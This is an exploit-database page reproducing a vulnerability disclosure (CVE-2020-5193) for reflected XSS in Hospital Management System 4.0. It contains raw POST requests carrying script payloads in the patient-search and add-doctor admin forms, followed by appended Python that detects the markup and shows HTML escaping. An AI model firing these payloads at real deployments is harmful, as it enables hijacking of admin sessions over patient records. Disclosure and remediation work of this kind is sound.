## https://sploitus.com/exploit?id=PACKETSTORM:155929
> # Exploit Title: Hospital Management System 4.0 Multiple Reflected XSS  
> # Google Dork: N/A  
> # Date: 1/2/2020  
> # Exploit Author: FULLSHADE  
> # Vendor Homepage: https://phpgurukul.com/  
> # Software Link: https://phpgurukul.com/hospital-management-system-in-php/  
> # Version: v4.0  
> # Tested on: Windows  
> # CVE : CVE-2020-5193  
>  
> ================ 1 - Cross Site Scripting (Reflected) ================  
>  
> POST /hospital/hospital/hms/admin/patient-search.php HTTP/1.1  
> Host: 10.0.0.214  
> User-Agent: Mozilla/5.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded  
> Content-Length: 74  
> Origin: http://10.0.0.214  
> DNT: 1  
> Connection: close  
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/patient-search.php  
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
> Upgrade-Insecure-Requests: 1  
>  
> searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search=  
>  
> ?searchdata parameter is vulnerable to reflected XSS in the search field  
>  
> ================ 2 - Cross Site Scripting (Reflected) ================  
>  
> POST /hospital/hospital/hms/admin/add-doctor.php HTTP/1.1  
> Host: 10.0.0.214  
> User-Agent: Mozilla/5.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
> Accept-Language: en-US,en;q=0.5  
> Accept-Encoding: gzip, deflate  
> Content-Type: application/x-www-form-urlencoded  
> Content-Length: 187  
> Origin: http://10.0.0.214  
> DNT: 1  
> Connection: close  
> Referer: http://10.0.0.214/hospital/hospital/hms/admin/add-doctor.php  
> Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
> Upgrade-Insecure-Requests: 1  
>  
> Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&clinicaddress=123&docfees=123&doccontact=123&docemail=123%40gmail.com&npass=123&cfpass=123&submit=  
>  
> ?docname parameter is vulnerable to reflected XSS when managing and adding a new doctor
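The two request bodies from the advisory, decoded and checked from the defender's side, as an added example that is not part of the original advisory or of the vendor's code: it flags the form parameters carrying markup and shows the output-encoding the echoing pages need. The regex, the function names and the surrounding `<p>` markup are assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed test input: the two POST bodies quoted in the advisory above.
SEARCH_BODY = "searchdata=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E&search="
DOCTOR_BODY = (
    "Doctorspecialization=123&docname=%3Cscript%3Ealert%28%22xss+machine%22%29%3C%2Fscript%3E"
    "&clinicaddress=123&docfees=123&doccontact=123&docemail=123%40gmail.com"
    "&npass=123&cfpass=123&submit="
)

# Heuristic for markup-bearing form values: an opening/closing tag, an
# inline event-handler attribute, or a javascript: URL (assumed pattern).
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def flag_markup_params(body: str) -> dict[str, str]:
    """Decode an application/x-www-form-urlencoded body and return the
    parameters whose decoded values contain HTML markup, keyed by name."""
    params = parse_qs(body, keep_blank_values=True)
    return {
        name: values[0]
        for name, values in params.items()
        if any(MARKUP_RE.search(v) for v in values)
    }


def render_search_echo(searchdata: str) -> str:
    """Hardened equivalent of echoing the search term back into the page:
    HTML-encode it (including quotes) so the browser renders it as text."""
    return "<p>Results for: " + html.escape(searchdata, quote=True) + "</p>"


if __name__ == "__main__":
    for body in (SEARCH_BODY, DOCTOR_BODY):
        for name, value in flag_markup_params(body).items():
            print(f"{name}: {value!r}")
            print("  encoded as:", render_search_echo(value))
```

The same `html.escape` treatment applies to `docname` wherever add-doctor.php writes it back into HTML; attribute contexts additionally need the value quoted.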